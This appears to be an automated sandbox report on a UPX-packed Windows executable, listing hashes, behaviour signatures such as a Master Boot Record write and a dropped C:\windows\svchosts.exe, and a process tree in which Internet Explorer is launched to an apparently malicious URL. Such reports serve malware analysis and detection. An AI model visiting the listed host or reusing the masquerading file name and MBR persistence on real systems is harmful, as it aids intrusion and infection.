Analysis

  • max time kernel
    152s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    20/10/2022, 05:03

General

  • Target

    15c70b04d686fdaf34d2f2df5ac76986df288bf505dd8f413484cbd8699acacc.exe

  • Size

    43KB

  • MD5

    81935c148dd22cdc3c4a43b07dd1f630

  • SHA1

    794e7127574d9f4fa8d2743af9cf39d6dadcbffa

  • SHA256

    15c70b04d686fdaf34d2f2df5ac76986df288bf505dd8f413484cbd8699acacc

  • SHA512

    3942363bfc6df04edc88bd899e9d1eeb243b16415c6c0aa4f9f0f633bb49e81c435f7a53097eb56a418f9e3fad00acdf13e10b25ec4c23d998ad29a95cc1cdcc

  • SSDEEP

    768:xprJMnye6TIYCm/YVB+PtYUU4V9pTJaPF076Gc3dxFWuIdXmXHm:DrJMye6LCTB+PtYUU4VPP7ktrKXmXHm

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in Windows directory 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\15c70b04d686fdaf34d2f2df5ac76986df288bf505dd8f413484cbd8699acacc.exe
    "C:\Users\Admin\AppData\Local\Temp\15c70b04d686fdaf34d2f2df5ac76986df288bf505dd8f413484cbd8699acacc.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1128
    • C:\windows\svchosts.exe
      C:\windows\svchosts.exe auto
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:844
    • C:\progra~1\Intern~1\iexplore.exe
      C:\\progra~1\\Intern~1\\iexplore.exe http://jianqiangzhe1.com/AddSetup.asp?id=137&localID=QM00013&isqq=3
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2032
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2032 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1896

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\X64XWU4M.txt

    Filesize

    603B

    MD5

    d162f39c6354ccd9caf1498377918c0d

    SHA1

    2c65b3e7bca29c267224c9f8ac96a7559f911460

    SHA256

    35653f39db3730982e7645c72430f23f4e7be6f93977d53d4e1849af0b78d156

    SHA512

    922cee959ea6ce4fd3ed2cfbcf68f636bb22a7eacbde1a58785a54b22a13018c7be594305a04348e2754317c035f631ea69106dc0483ae2136cea384a01f1c95

  • C:\Windows\svchosts.exe

    Filesize

    43KB

    MD5

    81935c148dd22cdc3c4a43b07dd1f630

    SHA1

    794e7127574d9f4fa8d2743af9cf39d6dadcbffa

    SHA256

    15c70b04d686fdaf34d2f2df5ac76986df288bf505dd8f413484cbd8699acacc

    SHA512

    3942363bfc6df04edc88bd899e9d1eeb243b16415c6c0aa4f9f0f633bb49e81c435f7a53097eb56a418f9e3fad00acdf13e10b25ec4c23d998ad29a95cc1cdcc

  • memory/844-65-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB

  • memory/844-71-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB

  • memory/1128-68-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB

  • memory/1128-63-0x0000000000260000-0x000000000027E000-memory.dmp

    Filesize

    120KB

  • memory/1128-62-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB

  • memory/1128-67-0x0000000074DC1000-0x0000000074DC3000-memory.dmp

    Filesize

    8KB

  • memory/1128-70-0x0000000000260000-0x000000000027E000-memory.dmp

    Filesize

    120KB

  • memory/1128-69-0x0000000000260000-0x000000000027E000-memory.dmp

    Filesize

    120KB

  • memory/1128-64-0x0000000000260000-0x000000000027E000-memory.dmp

    Filesize

    120KB

  • memory/1128-72-0x0000000000400000-0x000000000041E000-memory.dmp

    Filesize

    120KB

  • memory/2032-66-0x00000000020E0000-0x00000000020F0000-memory.dmp

    Filesize

    64KB

  • memory/2032-61-0x000007FEFB9E1000-0x000007FEFB9E3000-memory.dmp

    Filesize

    8KB